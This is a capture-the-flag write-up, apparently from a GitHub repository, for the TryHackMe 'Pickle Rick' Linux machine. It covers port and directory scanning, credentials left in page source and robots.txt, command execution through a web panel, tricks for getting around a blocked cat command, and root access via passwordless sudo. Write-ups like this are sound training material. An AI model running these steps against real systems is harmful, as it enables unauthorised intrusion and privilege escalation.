Skip to content

PickleRick.md

Latest commit

 

History

History
149 lines (103 loc) · 2.67 KB

PickleRick.md

File metadata and controls

149 lines (103 loc) · 2.67 KB

Pickle Rick

Platform: TryHackMe
OS: Linux
Difficulty: Easy
Tags: web rce command-injection sudo linux
Date: 2026-05

Summary

Rick and Morty-themed Linux machine. The web app has a command panel protected by login credentials hidden in page source and a robots.txt file. Once logged in, the command panel gives direct RCE as www-data. Escalated to root via unrestricted sudo — all commands allowed with no password.

Enumeration

Port Scan

nmap -sV -sC -p- --min-rate 5000 <TARGET_IP>
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2
80/tcp open  http    Apache httpd 2.4.18

Web Enumeration

Page source of the index page contains a comment:

<!--
    Note to self, remember username!
    Username: R1ckRul3s
-->

robots.txt reveals:

Wubbalubbadubdub

This is the password.

Ran Gobuster to find hidden pages:

gobuster dir -u http://<TARGET_IP> \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,html,txt
/login.php      (Status: 200)
/portal.php     (Status: 302)
/assets         (Status: 301)

Foothold

Login

Navigated to /login.php and logged in with:

  • Username: R1ckRul3s
  • Password: Wubbalubbadubdub

Command Panel — RCE

/portal.php has a "Command Panel" input field that executes system commands directly. Not a shell — just a web form, but it gives code execution.

whoami
# www-data

ls /home/rick
# second ingredients

cat /home/rick/"second ingredients"
# [INGREDIENT 2]

The cat command is blocked — used alternatives:

less /home/rick/"second ingredients"
# or
grep . /home/rick/"second ingredients"

First Ingredient

ls /var/www/html
cat /var/www/html/Sup3rS3cretPickl3Ingred.txt
# [INGREDIENT 1]

Privilege Escalation

Sudo Check

sudo -l
User www-data may run the following commands on ip-...:
    (ALL) NOPASSWD: ALL

Full unrestricted sudo with no password — immediate root:

sudo bash
whoami
# root

Third Ingredient

cat /root/3rd.txt
# [INGREDIENT 3]

Key Lessons

  • Always check page source — credentials and hints are frequently left in HTML comments
  • robots.txt is always worth checking — it often reveals hidden paths or sensitive info
  • When cat is blocked, try less, grep ., strings, tac, or head
  • sudo -l showing (ALL) NOPASSWD: ALL is instant root — one of the best findings in a pentest
  • RCE through a web command panel is as dangerous as a full shell

References